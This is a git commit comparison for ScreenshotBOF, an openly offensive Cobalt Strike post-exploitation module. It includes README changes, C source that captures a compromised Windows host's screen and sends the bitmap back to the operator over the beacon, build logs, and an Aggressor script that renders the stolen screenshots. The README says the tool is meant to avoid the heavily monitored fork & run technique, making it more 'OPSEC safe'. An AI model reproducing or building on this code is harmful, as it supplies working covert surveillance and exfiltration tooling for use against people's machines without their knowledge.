Compare commits
25 Commits
in_memory_
...
master
Author | SHA1 | Date |
---|---|---|
CodeXTF2 | 9bdc050f24 | |
CodeXTF2 | dd8b6d02dd | |
CodeXTF2 | e098c519a8 | |
CodeXTF2 | 9892cbdcd0 | |
CodeXTF2 | 95b1311d60 | |
CodeXTF2 | c61e2259fa | |
CodeXTF2 | bb72621cd3 | |
CodeX | 20989d338d | |
CodeX | b5bf5bad8c | |
CodeX | c2dbb32115 | |
CodeX | 0844cb819f | |
CodeX | 98d0c1746b | |
CodeXTF2 | 3a96075d72 | |
CodeXTF2 | 053e265950 | |
CodeXTF2 | fad595320d | |
CodeXTF2 | 41b9629f38 | |
CodeX | c9011f6684 | |
CodeX | 9de5381c0a | |
CodeX | 1f0ad54b5c | |
BinaryFaultline | 1c4b3d84cc | |
BinaryFaultline | dea10235e2 | |
BinaryFaultline | f6fd0e6738 | |
CodeX | 263b680944 | |
CodeXTF2 | 4f66ef6b8e | |
CodeXTF2 | 7e0ee92cc4 |
39
README.md
39
README.md
|
@ -1,37 +1,42 @@
|
||||||
# ScreenshotBOF
|
# ScreenshotBOF
|
||||||
|
|
||||||
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
|
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.
|
||||||
|
|
||||||
## Self Compilation
|
## Self Compilation
|
||||||
1. git clone the repo
|
1. git clone the repo
|
||||||
2. open the solution in Visual Studio
|
2. open the solution in Visual Studio
|
||||||
3. Build project BOF
|
3. Build project BOF
|
||||||
|
|
||||||
|
## Save methods:
|
||||||
|
0. drop file to disk
|
||||||
|
1. download file over beacon (Cobalt Strike only)
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
1. import the screenshotBOF.cna script into Cobalt Strike
|
1. import the screenshotBOF.cna script into Cobalt Strike
|
||||||
2. use the command screenshot_bof
|
2. use the command screenshot_bof {local filename} {save method 0/1}
|
||||||
3. Download the screenshot from the target
|
|
||||||
```
|
```
|
||||||
beacon> screenshot_bof
|
beacon> screenshot_bof sad.bmp 1
|
||||||
[*] Running screenshot BOF by (@codex_tf2)
|
[*] Running screenshot BOF by (@codex_tf2)
|
||||||
[+] host called home, sent: 3411 bytes
|
[+] host called home, sent: 5267 bytes
|
||||||
[+] received output:
|
[+] received output:
|
||||||
[*] Tasked beacon to printscreen and save to disk
|
[*] Screen saved to bitmap
|
||||||
[+] received output:
|
[+] received output:
|
||||||
[+] PrintScreen saved to bitmap...
|
[*] Downloading bitmap over beacon with filename sad.bmp
|
||||||
[+] received output:
|
[*] started download of sad.bmp
|
||||||
[+] Printscreen bitmap saved to screenshot.bmp
|
|
||||||
beacon> download screenshot.bmp
|
|
||||||
[*] Tasked beacon to download screenshot.bmp
|
|
||||||
[+] host called home, sent: 22 bytes
|
|
||||||
[*] started download of C:\screenshot.bmp (12441668 bytes)
|
|
||||||
[*] download of screenshot.bmp is complete
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
3. if downloaded over beacon, BMP can be viewed in Cobalt Strike by right clicking the download and clicking "Render BMP" (credit @BinaryFaultline)
|
||||||
|
|
||||||
|
![image](https://user-images.githubusercontent.com/29991665/199232459-0601e5d8-d534-4f05-bde4-c8acf3bd3c12.png)
|
||||||
|
|
||||||
|
![image](https://user-images.githubusercontent.com/29991665/199233465-8159cec4-90a4-4d82-beff-b012753b3559.png)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Notes
|
## Notes
|
||||||
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
|
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
|
||||||
- in memory downloading of screenshots is planned to be added
|
|
||||||
- the filename can be changed in the source code.
|
|
||||||
|
|
||||||
## Why did I make this?
|
## Why did I make this?
|
||||||
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
|
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
|
||||||
|
@ -39,3 +44,5 @@ Cobalt Strike uses a technique known as fork & run for many of its post-ex capab
|
||||||
## Credits
|
## Credits
|
||||||
- Made using https://github.com/securifybv/Visual-Studio-BOF-template
|
- Made using https://github.com/securifybv/Visual-Studio-BOF-template
|
||||||
- Save BMP to file from https://stackoverflow.com/a/60667564
|
- Save BMP to file from https://stackoverflow.com/a/60667564
|
||||||
|
- in memory download from https://github.com/anthemtotheego/CredBandit
|
||||||
|
- @BinaryFaultline for BMP rendering in aggressorscript, and screenshot callback branch
|
||||||
|
|
|
@ -6,6 +6,16 @@
|
||||||
#pragma comment(lib, "Gdi32.lib")
|
#pragma comment(lib, "Gdi32.lib")
|
||||||
|
|
||||||
char downloadfilename[] = "screenshot.bmp";
|
char downloadfilename[] = "screenshot.bmp";
|
||||||
|
|
||||||
|
//i love chatgpt
|
||||||
|
size_t my_strlen(const char* str) {
|
||||||
|
size_t len = 0;
|
||||||
|
while (str[len] != '\0') {
|
||||||
|
len++;
|
||||||
|
}
|
||||||
|
return len;
|
||||||
|
}
|
||||||
|
|
||||||
/*Download File*/
|
/*Download File*/
|
||||||
void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) {
|
void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) {
|
||||||
|
|
||||||
|
@ -152,7 +162,7 @@ BOOL _print_error(char* func, int line, char* msg, HRESULT hr) {
|
||||||
#pragma endregion
|
#pragma endregion
|
||||||
|
|
||||||
|
|
||||||
BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
|
BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName, int savemethod)
|
||||||
{
|
{
|
||||||
HDC hDC;
|
HDC hDC;
|
||||||
int iBits;
|
int iBits;
|
||||||
|
@ -226,9 +236,22 @@ BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
|
||||||
memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER));
|
memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER));
|
||||||
memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize);
|
memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize);
|
||||||
|
|
||||||
|
if (savemethod == 0) {
|
||||||
|
BeaconPrintf(0x0, "[*] Saving bitmap to disk with filename %s", lpszFileName);
|
||||||
|
fh = CreateFileA(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
|
||||||
|
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
|
||||||
|
|
||||||
|
if (fh == INVALID_HANDLE_VALUE)
|
||||||
|
return FALSE;
|
||||||
|
WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL);
|
||||||
|
CloseHandle(fh);
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
BeaconPrintf(0x0, "[*] Downloading bitmap over beacon with filename %s", lpszFileName);
|
||||||
|
downloadFile((char*)lpszFileName, my_strlen(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize));
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize));
|
|
||||||
//WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL);
|
|
||||||
|
|
||||||
/* clean up */
|
/* clean up */
|
||||||
GlobalUnlock(hDib);
|
GlobalUnlock(hDib);
|
||||||
|
@ -242,8 +265,13 @@ void go(char* buff, int len) {
|
||||||
datap parser;
|
datap parser;
|
||||||
char * downloadfilename;
|
char * downloadfilename;
|
||||||
BeaconDataParse(&parser, buff, len);
|
BeaconDataParse(&parser, buff, len);
|
||||||
|
//what should the file be named?
|
||||||
downloadfilename = BeaconDataExtract(&parser, NULL);
|
downloadfilename = BeaconDataExtract(&parser, NULL);
|
||||||
BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename);
|
//how should it be saved?
|
||||||
|
//0 - drop to disk
|
||||||
|
//1 - download as file in cobaltstrike
|
||||||
|
//2 - NOT IMPLEMENTED YET - planned to be screenshot callback, refer to branch.
|
||||||
|
int savemethod = BeaconDataInt(&parser);
|
||||||
int x1, y1, x2, y2, w, h;
|
int x1, y1, x2, y2, w, h;
|
||||||
// get screen dimensions
|
// get screen dimensions
|
||||||
x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
|
x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
|
||||||
|
@ -269,10 +297,9 @@ void go(char* buff, int len) {
|
||||||
SetClipboardData(CF_BITMAP, hBitmap);
|
SetClipboardData(CF_BITMAP, hBitmap);
|
||||||
CloseClipboard();
|
CloseClipboard();
|
||||||
*/
|
*/
|
||||||
|
BeaconPrintf(0x0, "[*] Screen saved to bitmap");
|
||||||
BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap...");
|
|
||||||
LPCSTR filename = (LPCSTR)downloadfilename;
|
LPCSTR filename = (LPCSTR)downloadfilename;
|
||||||
SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename);
|
SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename,savemethod);
|
||||||
|
|
||||||
//BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename);
|
//BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename);
|
||||||
// clean up
|
// clean up
|
||||||
|
|
|
@ -203,6 +203,7 @@ DECLSPEC_IMPORT void WINAPI MSVCRT$sprintf(char*, char[], ...);
|
||||||
DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list);
|
DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list);
|
||||||
DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR);
|
DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR);
|
||||||
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2);
|
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2);
|
||||||
|
DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char* str);
|
||||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
|
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
|
||||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2);
|
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2);
|
||||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength);
|
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength);
|
||||||
|
|
|
@ -1,25 +0,0 @@
|
||||||
Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x64
|
|
||||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
|
||||||
|
|
||||||
cl /c /D BOF /GS- /Fo"intermediary\BOF\x64\\" /TP /c /Fo"intermediary\BOF\x64\source" Source.cpp
|
|
||||||
cl : Command line warning D9025: overriding '/Fointermediary\BOF\x64\' with '/Fointermediary\BOF\x64\source'
|
|
||||||
|
|
||||||
Source.cpp
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
|
|
||||||
C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj
|
|
||||||
1 File(s) copied
|
|
||||||
enumerating sections...
|
|
||||||
found debug section.. zeroing it...
|
|
||||||
closing stream...
|
|
||||||
done!
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,2 +0,0 @@
|
||||||
PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0:
|
|
||||||
BOF|x64|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\|
|
|
|
@ -1,5 +0,0 @@
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\source.obj
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x64.obj
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.command.1.tlog
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.read.1.tlog
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.write.1.tlog
|
|
|
@ -1,7 +0,0 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project>
|
|
||||||
<ProjectOutputs>C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx64</ProjectOutputs>
|
|
||||||
<ContentFiles></ContentFiles>
|
|
||||||
<SatelliteDlls></SatelliteDlls>
|
|
||||||
<NonRecipeFileRefs></NonRecipeFileRefs>
|
|
||||||
</Project>
|
|
Binary file not shown.
|
@ -1,25 +0,0 @@
|
||||||
Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x86
|
|
||||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
|
||||||
|
|
||||||
cl /c /Oy- /D BOF /GS- /Fo"intermediary\BOF\x86\\" /TP /analyze- /c /Fo"intermediary\BOF\x86\source" Source.cpp
|
|
||||||
cl : Command line warning D9025: overriding '/Fointermediary\BOF\x86\' with '/Fointermediary\BOF\x86\source'
|
|
||||||
|
|
||||||
Source.cpp
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
|
|
||||||
C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
|
|
||||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj
|
|
||||||
1 File(s) copied
|
|
||||||
enumerating sections...
|
|
||||||
found debug section.. zeroing it...
|
|
||||||
closing stream...
|
|
||||||
done!
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,2 +0,0 @@
|
||||||
PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0:
|
|
||||||
BOF|Win32|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\|
|
|
|
@ -1,5 +0,0 @@
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\source.obj
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x86.obj
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.command.1.tlog
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.read.1.tlog
|
|
||||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.write.1.tlog
|
|
|
@ -1,7 +0,0 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project>
|
|
||||||
<ProjectOutputs>C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx32</ProjectOutputs>
|
|
||||||
<ContentFiles></ContentFiles>
|
|
||||||
<SatelliteDlls></SatelliteDlls>
|
|
||||||
<NonRecipeFileRefs></NonRecipeFileRefs>
|
|
||||||
</Project>
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,24 +1,198 @@
|
||||||
|
import javax.imageio.ImageIO;
|
||||||
|
import java.awt.*;
|
||||||
|
import javax.swing.JLabel;
|
||||||
|
import javax.swing.ImageIcon;
|
||||||
|
import java.io.ByteArrayInputStream;
|
||||||
|
|
||||||
|
# This function takes in a screenshot and creates a JLabel to display the screenshot
|
||||||
|
sub display_image {
|
||||||
|
local('$screenshot $screenshot_bytes $bid $user $computer $client $MAX_IMAGE_WIDTH $MAX_IMAGE_HEIGHT $bias $image $width $height $icon $scaledIcon $component $tab_name');
|
||||||
|
$screenshot = $1;
|
||||||
|
$screenshot_bytes = $screenshot['data'];
|
||||||
|
$bid = $screenshot['bid'];
|
||||||
|
$user = $screenshot['user'];
|
||||||
|
$computer = beacon_info($bid, 'computer');
|
||||||
|
|
||||||
|
$client = getAggressorClient();
|
||||||
|
$MAX_IMAGE_WIDTH = [[[$client getTabManager] getTabbedPane] getWidth];
|
||||||
|
$MAX_IMAGE_HEIGHT = [[[$client getTabManager] getTabbedPane] getHeight];
|
||||||
|
|
||||||
|
$bais = [new ByteArrayInputStream: $screenshot_bytes];
|
||||||
|
$image = [ImageIO read: $bais];
|
||||||
|
|
||||||
|
$width = [$image getWidth];
|
||||||
|
$height = [$image getHeight];
|
||||||
|
|
||||||
|
$icon = [new ImageIcon: $image];
|
||||||
|
if ($width > $MAX_IMAGE_WIDTH) {
|
||||||
|
$width = $MAX_IMAGE_WIDTH;
|
||||||
|
}
|
||||||
|
if ($height > $MAX_IMAGE_HEIGHT) {
|
||||||
|
$height = $MAX_IMAGE_HEIGHT;
|
||||||
|
}
|
||||||
|
$scaledIcon = [new ImageIcon: [$image getScaledInstance: $width, $height, 4]];
|
||||||
|
|
||||||
|
$component = [new JLabel: $scaledIcon];
|
||||||
|
$tab_name = "ScreenshotBOF - $user\@$computer";
|
||||||
|
addTab($tab_name, $component, "...");
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
# This function takes in a screenshot and creates a JLabel to display the screenshot
|
||||||
|
sub display_downloaded {
|
||||||
|
local('$screenshot $screenshot_bytes $bid $user $computer $client $MAX_IMAGE_WIDTH $MAX_IMAGE_HEIGHT $bias $image $width $height $icon $scaledIcon $component $tab_name');
|
||||||
|
|
||||||
|
$screenshot_bytes = $1;
|
||||||
|
$file_name = $2;
|
||||||
|
|
||||||
|
$client = getAggressorClient();
|
||||||
|
$MAX_IMAGE_WIDTH = [[[$client getTabManager] getTabbedPane] getWidth];
|
||||||
|
$MAX_IMAGE_HEIGHT = [[[$client getTabManager] getTabbedPane] getHeight];
|
||||||
|
|
||||||
|
$bais = [new ByteArrayInputStream: $screenshot_bytes];
|
||||||
|
$image = [ImageIO read: $bais];
|
||||||
|
|
||||||
|
$width = [$image getWidth];
|
||||||
|
$height = [$image getHeight];
|
||||||
|
|
||||||
|
$icon = [new ImageIcon: $image];
|
||||||
|
if ($width > $MAX_IMAGE_WIDTH) {
|
||||||
|
$width = $MAX_IMAGE_WIDTH;
|
||||||
|
}
|
||||||
|
if ($height > $MAX_IMAGE_HEIGHT) {
|
||||||
|
$height = $MAX_IMAGE_HEIGHT;
|
||||||
|
}
|
||||||
|
$scaledIcon = [new ImageIcon: [$image getScaledInstance: $width, $height, 4]];
|
||||||
|
|
||||||
|
$component = [new JLabel: $scaledIcon];
|
||||||
|
$tab_name = "ScreenshotBOF - $file_name";
|
||||||
|
addTab($tab_name, $component, "...");
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
# Checks the screenshot when it comes in to see if it is a BMP, then if so, renders it in a new tab
|
||||||
|
on screenshots {
|
||||||
|
local('$screenshot $data');
|
||||||
|
|
||||||
|
$screenshot = $1;
|
||||||
|
$data = $screenshot['data'];
|
||||||
|
|
||||||
|
# Check the magic header of the data to see if it's a BMP
|
||||||
|
if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") {
|
||||||
|
display_image($screenshot);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
popup_clear("downloads");
|
||||||
|
popup downloads {
|
||||||
|
# do nothing if nothing is selected
|
||||||
|
if (size($1) == 0) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
item "Interact" {
|
||||||
|
openOrActivate($1[0]["bid"]);
|
||||||
|
}
|
||||||
|
|
||||||
|
menu "&Color" {
|
||||||
|
local('$ids');
|
||||||
|
$ids = map({ return $1["id"]; }, $1);
|
||||||
|
insert_component(colorPanel("accents", $ids));
|
||||||
|
}
|
||||||
|
|
||||||
|
item "Render &BMP" {
|
||||||
|
local('$download $lpath $name $count');
|
||||||
|
foreach $count => $download ($1) {
|
||||||
|
($lpath, $name) = values($download, @("lpath", "name"));
|
||||||
|
|
||||||
|
sync_download($lpath, script_resource("file $+ .$count"), lambda({
|
||||||
|
$handle = openf($1);
|
||||||
|
$data = readb($handle, -1);
|
||||||
|
closef($handle);
|
||||||
|
#println(charAt($data, 0));
|
||||||
|
#println(charAt($data, 1));
|
||||||
|
if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") {
|
||||||
|
display_downloaded($data, $1);
|
||||||
|
} else {
|
||||||
|
show_error("File is not a Bitmap image");
|
||||||
|
}
|
||||||
|
deleteFile($1);
|
||||||
|
}, \$name));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
popup_clear("screenshots");
|
||||||
|
popup screenshots {
|
||||||
|
item "&Interact" {
|
||||||
|
openOrActivate($1["bid"]);
|
||||||
|
}
|
||||||
|
|
||||||
|
menu "&Color" {
|
||||||
|
insert_component(colorPanel("accents", $1["id"]));
|
||||||
|
}
|
||||||
|
|
||||||
|
item "&Save" {
|
||||||
|
prompt_file_save($1["id"] . ".jpg", lambda({
|
||||||
|
local('$handle');
|
||||||
|
$handle = openf("> $+ $1");
|
||||||
|
writeb($handle, $data);
|
||||||
|
closef($handle);
|
||||||
|
|
||||||
|
show_message("Screenshot saved.");
|
||||||
|
}, $data => $1["object"]["data"]));
|
||||||
|
}
|
||||||
|
|
||||||
|
separator();
|
||||||
|
|
||||||
|
item "&Remove" {
|
||||||
|
redactobject($1["id"]);
|
||||||
|
}
|
||||||
|
|
||||||
|
item "Render &BMP" {
|
||||||
|
$data = $1["object"]['data'];
|
||||||
|
|
||||||
|
# Check the magic header of the data to see if it's a BMP
|
||||||
|
if (charAt($data, 0) eq "B" && charAt($data, 1) eq "M") {
|
||||||
|
display_image($1["object"]);
|
||||||
|
} else {
|
||||||
|
show_error("Image is not a Bitmap. It should render in Screenshots tab.");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
#Register command
|
#Register command
|
||||||
beacon_command_register(
|
beacon_command_register(
|
||||||
"screenshot_bof",
|
"screenshot_bof",
|
||||||
"Alternative screenshot capability that does not do fork n run",
|
"Alternative screenshot capability that does not do fork n run",
|
||||||
"Synopsis: screenshot_bof"
|
"Use: screenshot_bof [filename] [save method]\nSave methods:\n\t0: drop file to disk\n\t1: download over beacon\n\nTake a screenshot inline using a BOF. Screenshot is saved as BMP on disk or downloaded over beacon."
|
||||||
);
|
);
|
||||||
|
|
||||||
alias screenshot_bof {
|
alias screenshot_bof {
|
||||||
local('$barch $handle $data $args $target_pid');
|
local('$bid $barch $handle $data $args $target_pid');
|
||||||
println(@_);
|
$bid = $1;
|
||||||
# figure out the arch of this session
|
# figure out the arch of this session
|
||||||
$barch = barch($1);
|
$barch = barch($bid);
|
||||||
|
if (size(@_) != 3)
|
||||||
|
{
|
||||||
|
berror($1, "Syntax: screenshot_bof [filename] [save method 0/1] e.g. screenshot_bof file.bmp 1");
|
||||||
|
return;
|
||||||
|
}
|
||||||
# read in the right BOF file
|
# read in the right BOF file
|
||||||
$handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj"));
|
$handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj"));
|
||||||
$data = readb($handle, -1);
|
$data = readb($handle, -1);
|
||||||
closef($handle);
|
closef($handle);
|
||||||
|
|
||||||
$args = bof_pack($1, "z",$2);
|
# FEATURE PUT ON HOLD DUE TO STABILITY
|
||||||
|
# figure out if the profile chooses to chunk the post or not (getOnlyProfile)
|
||||||
|
# $profile = data_query("metadata")["c2profile"];
|
||||||
|
